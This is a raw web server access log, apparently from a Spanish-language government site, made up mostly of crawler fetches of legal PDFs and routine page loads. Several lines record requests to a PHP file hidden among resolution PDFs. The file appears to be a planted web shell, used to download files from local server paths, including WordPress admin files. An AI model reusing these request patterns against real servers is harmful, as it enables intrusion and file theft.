172.22.2.4 - - [29/Jun/2024:09:24:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [29/Jun/2024:09:24:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [29/Jun/2024:09:24:33 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [29/Jun/2024:09:24:33 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [29/Jun/2024:09:24:34 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
66.249.66.13 - - [29/Jun/2024:09:24:37 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%201%20del%2014%20de%20enero%20de%202013.pdf HTTP/1.1" 200 1298384
172.22.2.4 - - [29/Jun/2024:09:24:41 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [29/Jun/2024:09:24:41 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [29/Jun/2024:09:24:41 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [29/Jun/2024:09:24:41 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
66.249.66.11 - - [29/Jun/2024:09:24:41 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%209%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1402289
66.249.66.11 - - [29/Jun/2024:09:24:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3363.pdf HTTP/1.1" 200 397048
66.249.66.15 - - [29/Jun/2024:09:24:46 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2015%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 486506
201.245.192.253 - - [29/Jun/2024:09:24:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:09:24:58 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2026%20del%2028%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 332220
66.249.66.15 - - [29/Jun/2024:09:24:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/02001.pdf HTTP/1.1" 200 1781151
66.249.66.14 - - [29/Jun/2024:09:24:59 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
66.249.66.15 - - [29/Jun/2024:09:25:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0204.pdf HTTP/1.1" 200 350991
66.249.66.13 - - [29/Jun/2024:09:25:05 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 200 422655
66.249.66.16 - - [29/Jun/2024:09:25:14 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2022%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1563219
172.22.2.4 - - [29/Jun/2024:09:24:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [29/Jun/2024:09:25:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [29/Jun/2024:09:25:24 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1018
66.249.66.13 - - [29/Jun/2024:09:25:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0969.pdf HTTP/1.1" 200 483382
66.249.66.13 - - [29/Jun/2024:09:25:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3009.pdf HTTP/1.1" 200 477803
40.77.167.53 - - [29/Jun/2024:09:25:29 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
66.249.66.12 - - [29/Jun/2024:09:25:34 -0500] "GET /BLA/boletinlegal/Directivas/2022/DIRECTIVA%20No.%2000001%20DEL%2015%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 200 290944
66.249.66.11 - - [29/Jun/2024:09:25:43 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 200 370015
66.249.66.11 - - [29/Jun/2024:09:25:44 -0500] "GET /BLA/resoluciones/AUTOS%202020/0380.pdf HTTP/1.1" 200 669696
66.249.66.11 - - [29/Jun/2024:09:25:53 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%2012%20del%2014%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 344384
201.245.192.253 - - [29/Jun/2024:09:25:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:25:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:09:26:00 -0500] "GET /BLA/resoluciones/AUTOS%202009/0891.pdf HTTP/1.1" 200 121499
66.249.66.13 - - [29/Jun/2024:09:26:02 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 159877
66.249.66.13 - - [29/Jun/2024:09:26:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4877.pdf HTTP/1.1" 200 399249
66.249.66.12 - - [29/Jun/2024:09:26:12 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 200 11898321
66.249.66.18 - - [29/Jun/2024:09:26:18 -0500] "GET /BLA/resoluciones/AUTOS%202011/4529.pdf HTTP/1.1" 200 190734
66.249.66.15 - - [29/Jun/2024:09:26:21 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000010%20DEL%2010%20DE%20OCTUBRE%20DEL%202023.pdf HTTP/1.1" 200 341821
66.249.66.17 - - [29/Jun/2024:09:26:31 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2023%20del%2026%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 481134
66.249.66.14 - - [29/Jun/2024:09:26:41 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
216.245.221.92 - - [29/Jun/2024:09:26:50 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.17 - - [29/Jun/2024:09:26:50 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000020%20del%2020%20de%20diciembre%20de%202019.pdf HTTP/1.1" 200 145170
201.245.192.253 - - [29/Jun/2024:09:26:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.14 - - [29/Jun/2024:09:27:00 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 351421
66.249.66.12 - - [29/Jun/2024:09:27:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3390.pdf HTTP/1.1" 200 353098
66.249.66.13 - - [29/Jun/2024:09:27:10 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000004%20DEL%2019%20DE%20MAYO%20DEL%202022.pdf HTTP/1.1" 200 252981
201.245.192.253 - - [29/Jun/2024:09:27:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35406
201.245.192.253 - - [29/Jun/2024:09:27:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34915
66.249.66.12 - - [29/Jun/2024:09:27:19 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 200 320793
66.249.66.15 - - [29/Jun/2024:09:27:28 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
66.249.66.11 - - [29/Jun/2024:09:27:38 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 200 228190
66.249.66.12 - - [29/Jun/2024:09:27:48 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%209%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 326687
207.46.13.102 - - [29/Jun/2024:09:27:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3595.pdf HTTP/1.1" 200 460099
201.245.192.253 - - [29/Jun/2024:09:27:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [29/Jun/2024:09:27:57 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 200 311468
201.245.192.253 - - [29/Jun/2024:09:27:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:09:28:07 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023.pdf HTTP/1.1" 200 334676
66.249.66.12 - - [29/Jun/2024:09:28:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3747.pdf HTTP/1.1" 200 3373968
66.249.66.12 - - [29/Jun/2024:09:28:13 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/Infografia/Parte2/M-145.png HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:09:28:16 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%201%20del%2030%20de%20Marzo%20de%202017.pdf HTTP/1.1" 200 668532
216.244.66.195 - - [29/Jun/2024:09:28:17 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.13 - - [29/Jun/2024:09:28:26 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2011%20del%2024%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 169541
66.249.66.12 - - [29/Jun/2024:09:28:35 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 163426
66.249.66.11 - - [29/Jun/2024:09:28:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3399.pdf HTTP/1.1" 200 347950
66.249.66.11 - - [29/Jun/2024:09:28:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1980.pdf HTTP/1.1" 200 406828
66.249.66.13 - - [29/Jun/2024:09:28:46 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2011%20del%2027%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 526945
172.22.2.4 - - [29/Jun/2024:09:27:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:09:28:55 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%203%20del%2014%20de%20Noviembre%20de%202014.pdf HTTP/1.1" 200 104132
201.245.192.253 - - [29/Jun/2024:09:28:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.14 - - [29/Jun/2024:09:29:04 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2012%20del%2028%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 369945
66.249.66.11 - - [29/Jun/2024:09:29:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4059.pdf HTTP/1.1" 200 467247
66.249.66.11 - - [29/Jun/2024:09:29:14 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2027%20de%20Junio%20de%202018.pdf HTTP/1.1" 200 217496
201.245.192.253 - - [29/Jun/2024:09:29:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33395
66.249.66.11 - - [29/Jun/2024:09:29:24 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 200 1416322
66.249.66.11 - - [29/Jun/2024:09:29:33 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000003%20DEL%2016%20DE%20FEBRERO%20DEL%202024.pdf HTTP/1.1" 200 262750
172.22.2.4 - - [29/Jun/2024:09:28:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.11 - - [29/Jun/2024:09:29:42 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%208%20del%2020%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 727150
66.249.66.12 - - [29/Jun/2024:09:29:51 -0500] "GET /BLA/resoluciones/AUTOS%202009/2551.pdf HTTP/1.1" 200 101256
66.249.66.12 - - [29/Jun/2024:09:29:52 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%20006%20del%2008%20de%20Febrero%20de%202019.pdf HTTP/1.1" 200 674401
207.46.13.130 - - [29/Jun/2024:09:29:55 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12733
201.245.192.253 - - [29/Jun/2024:09:29:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:29:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34915
201.245.192.253 - - [29/Jun/2024:09:29:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:09:30:02 -0500] "GET /BLA/boletinlegal/Directivas/2013/Directiva%20No.%201%20del%2004%20de%20Abril%20de%202013.pdf HTTP/1.1" 200 472003
66.249.66.13 - - [29/Jun/2024:09:30:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5207.pdf HTTP/1.1" 200 276671
66.249.66.11 - - [29/Jun/2024:09:30:11 -0500] "GET /bla/boletinlegal/Directivas/2017/Directiva%20No.%2006%20del%2016%20de%20Agosto%20de%202017.pdf HTTP/1.1" 200 310598
201.245.192.253 - - [29/Jun/2024:09:30:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.102.99.234 - - [29/Jun/2024:09:30:26 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX199WkBPhHtQi4LLySXNqr7QufwcRs40koZ3wtIbctJg8yQlv1rW2/QL&y=U2FsdGVkX182Y2ZylzoPG3t8xg29WQuXI2kzFqh9/qyI3u/P3GMpjaXNukQci28W HTTP/1.1" 200 30
186.84.20.58 - - [29/Jun/2024:09:30:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0113.pdf HTTP/1.1" 200 299867
186.102.99.234 - - [29/Jun/2024:09:30:26 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18CpgVnBOvNJjxH47zcZ+H7H5M/qSGa6GtPfZikWzZDvB6M8ualoZh2NhMPxtX1xb1fBC/C3IONTHHga4+JEAHYxhdzNE1WiDo=&u=U2FsdGVkX1/V+68Op/MkR1e20pyFZR7JiV5InjjPUHvQdqhhPdkRyqTcBA1IEU1m&y=U2FsdGVkX182Y2ZylzoPG3t8xg29WQuXI2kzFqh9/qyI3u/P3GMpjaXNukQci28W HTTP/1.1" 200 97
186.102.99.234 - - [29/Jun/2024:09:30:26 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+9eZCO5uC5dexwrgGs9B1WyVjFl3lJb96SPQr5WeunTjms2H+MsTKTbT1wV9RamA0j9JOnv0+noekplIZ4ZgiBUQheHaFYTqdDUqlINM3YIDhspg4dNDV7bTJ1nXlrGHb9hNylncX4C6XhEO20t7zMwF0K/qloHKMpeNK0faP2REW5/gORdF20uyeOtcrITMHyZuehKjQJRUGI9Fmw9VLmd3Mvf21jxDdfXnkzRUynw29UoYsmaIWQxXY6u43wCvUZR60SZ8INTRW5Nrhkis7S7H38UqXN7H2lNVsREA2d9M6+nb4FWkrMSpqwglUHxE9oWIr0GRilNTVse8kZWffFPxkfvhvWcBEekJKgRbiOhJ7znhzcwXqHF4v7SNGuyjgKmYKCohVb/iQsCf9K0vN668W3/DoFB++Znd9xpXslkZz/5qErPHo+bXrdIPIjGv3AoycYFCKaKW6kjI6NPWhP0/Cs2XvumgcEHN6cKDYKoutxZQbqn8/ioopwsnY4Xa4S9NYw6DkeWxg/7sgeRy9B96CnmIWOawtQinaZeuyaIWWSQmx0KST4YcT6sdjuFwXqCAZ+wxpSfVYuMyUf6hnxPz/IPSM5Oknt67/7vZZ8dXzMnd/7tQRxpTaTSFt0cT1bzPIdt967RvuFRE0sn7XYaqBdCv2bOqsJwJrt/5tjNRaGBcmuLOj5eK3Qd5cHqUqkvVRBesyE7oxlqBDy4EMiziPvVk9qLFnfcj2khwYgLz7ZCtRMjVxKJc9cVs5HghbmHz/bsRTJ9TLU2TVroSl4UNj2lRz8zwnX9lnb01LSXyaoYvlRpggix/D1/QNbWcKP71+HWGHPVSd2TGJs9xs0GHXqAZi0Ho0Y1QnumclGJIyVjgzxpr+bpzLEziO3/ygMtZvZGRTg4ZIRIh2hVWegqtBP6REe8DtZlB/Xjjt8Vtb7dHh5jluNlo5tsFYwrSLXhoPMvPDdyKFSprPK02Q9RZX5ULYgmQ4wv2MqBM/uw3NABhPAaYJSRVGN2CaYuSthv7S4IioCwuvBBp/UD8MkG+r1IPvMimn2dfWB1zJvvdCAUgfYxfG/DilM8tOmG1//YlI79tNpG1m0Vi02xdmheFREeGEcsiPJBuQ6vXveqnzIO6sChmGbdwMAM17EYLiIC3J7l6uXw9pX7i6dnPsQYW+yfDsK0sLheT+UNtJEgsUlQRuZnYQcGy2D/ufBKEQKwErbn+U0c4xHRTx0B8IsIL9Ukm5hfXEL7NK9MLXgsJnIhGW/CHdiWjj/QNTRe5q9kPdLclf7wlrVJGIwpx4byNfMOhufUfWFegh/B/7SuznOBZapfhRKDTNc+238Lgg0bKdfLWGBFzYd+hO7ZhmXZwGOWbhwBv03ojK6Crn8xtMUTm1PGmn4O/vTM+TYOvnH7GX734+KBaaE1g7ZjEWfab64VFLCqZOE8E9PZ0boYPx34WPXdaEFxvzEdgELq05n0suxoWCGD4z4U2SNzi+6HuVDNTYrvJMpWr8bIyUTca0NoxCtDhrg3mE8Pt4EO1wzG5H0gxVRbF0ue1IXeSyjhDxwWpax6ANsTPk2hITD4QLrM8gn7kW/ncuPCO/QPIDQ3nSe22L9nyklELlgi09KhwefZwBGMgcEHyZVuTqILYuHNgUesfbym8gZW6qngoscPhKmOnEPvZ9/5AQsSr3FMZPFnS56yZsb/Als2LGjfIICJyGPkG1axgBFre0woNahs9wXy+VL6Ba8khrFk7AGBYdtwe/0TgHoljdbxjI/tBMDpQwK7vVx&u=U2FsdGVkX1/V+68Op/MkR1e20pyFZR7JiV5InjjPUHvQdqhhPdkRyqTcBA1IEU1m&y=U2FsdGVkX182Y2ZylzoPG3t8xg29WQuXI2kzFqh9/qyI3u/P3GMpjaXNukQci28W HTTP/1.1" 200 9303
186.102.99.234 - - [29/Jun/2024:09:30:27 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX193tOIo0e2LoSoSAueJYegrXXEd8TWi0z9kzWodqZVUCDGe9a/KQz6g+yNDugrOPZK6DPUutBUKmi76iRDSQuLaQMrjQM/4GYo4R5mOd9aSLBuZEj0/v9cYZH844vit0Vw6leuCr1hwWrApMkJVprQ0wlJLr7LCNQG+Ge1KO583Z88cYCeJ62QfUfYvbk6eQIgJIncusVWMcJ9WtEtoqEJ3YgHSUNfjEZyJWx1jjSdrJmg5RJxmlG2WBTmeTif0x9o6pWKEckLmsolXtqJ3CXSEQ2AG0JQXUrh7to7fsXNZnoEg12QR6pJPbw/tY3e3dJBJikzWyIbcbdGUV7f4QVv5AocuU/PN1WKEEX4IsU8BBNnU4pMKS2Y+uo8D3u0C4ahWrl33hcg27i2b2LlUF7Pw0ZivbMn4zgcS1AdkB1zFshov8YIx0simEzlVWXDUB1CNy8W0GbLr8p9Hs+fh77B2jyAhnUDZgjJsxScc6fjoQCApKTlOfeZWaFYRfih6GJD4JfLNetM0jnG7dP7lDYJOthxcVszTTaLdJ23IZCus2XEiiH0L1evI5+IzRjl9P6GYnbJUOcTG3EaE03/ZK3xL3yuH/RVB3ohp3u99ron29ws3UEfqpoOXBOa7cBweO/gEuY7aL6ncxNVWVN5LbtIV/L/yARNiGIaLZxMm0i2YLx5vYIv3l2Qx4/GmwcTPDBrJ2BkcS3xfsWZ6QOyTp4X1Py6OB3g0NNPRHgD/yvrx9n0To6p6yp4V&u=U2FsdGVkX1/V+68Op/MkR1e20pyFZR7JiV5InjjPUHvQdqhhPdkRyqTcBA1IEU1m&y=U2FsdGVkX182Y2ZylzoPG3t8xg29WQuXI2kzFqh9/qyI3u/P3GMpjaXNukQci28W HTTP/1.1" 200 208
186.84.20.58 - - [29/Jun/2024:09:30:27 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.102.99.234 - - [29/Jun/2024:09:30:27 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX199WkBPhHtQi4LLySXNqr7QufwcRs40koZ3wtIbctJg8yQlv1rW2/QL HTTP/1.1" 200 30244
201.245.192.253 - - [29/Jun/2024:09:30:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:09:31:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1890.pdf HTTP/1.1" 200 361628
216.245.221.92 - - [29/Jun/2024:09:31:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:09:31:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:31:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.84.20.58 - - [29/Jun/2024:09:32:00 -0500] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1120
186.84.20.58 - - [29/Jun/2024:09:32:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.84.20.58 - - [29/Jun/2024:09:32:00 -0500] "GET /apple-touch-icon.png HTTP/1.1" 404 1120
66.249.66.11 - - [29/Jun/2024:09:32:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4664.pdf HTTP/1.1" 200 372249
66.249.66.11 - - [29/Jun/2024:09:32:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3474.pdf HTTP/1.1" 200 360331
47.128.55.90 - - [29/Jun/2024:09:32:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1596.pdf&ft=download HTTP/1.1" 200 20134
66.249.66.11 - - [29/Jun/2024:09:32:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2969.pdf HTTP/1.1" 200 636094
47.128.41.53 - - [29/Jun/2024:09:32:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=admin-header.php&ft=download&white=1 HTTP/1.1" 200 6739
47.128.114.70 - - [29/Jun/2024:09:32:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5885.pdf&ft=download HTTP/1.1" 200 425639
47.128.114.74 - - [29/Jun/2024:09:32:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=w-logo-white.png&ft=download HTTP/1.1" 200 4159
201.245.192.253 - - [29/Jun/2024:09:32:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:09:33:05 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.29.33.66 - - [29/Jun/2024:09:33:05 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.29.33.66 - - [29/Jun/2024:09:33:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:33:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:33:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:33:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:33:10 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.29.33.66 - - [29/Jun/2024:09:33:10 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.29.33.66 - - [29/Jun/2024:09:33:10 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
66.249.66.11 - - [29/Jun/2024:09:33:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0314.pdf HTTP/1.1" 200 478644
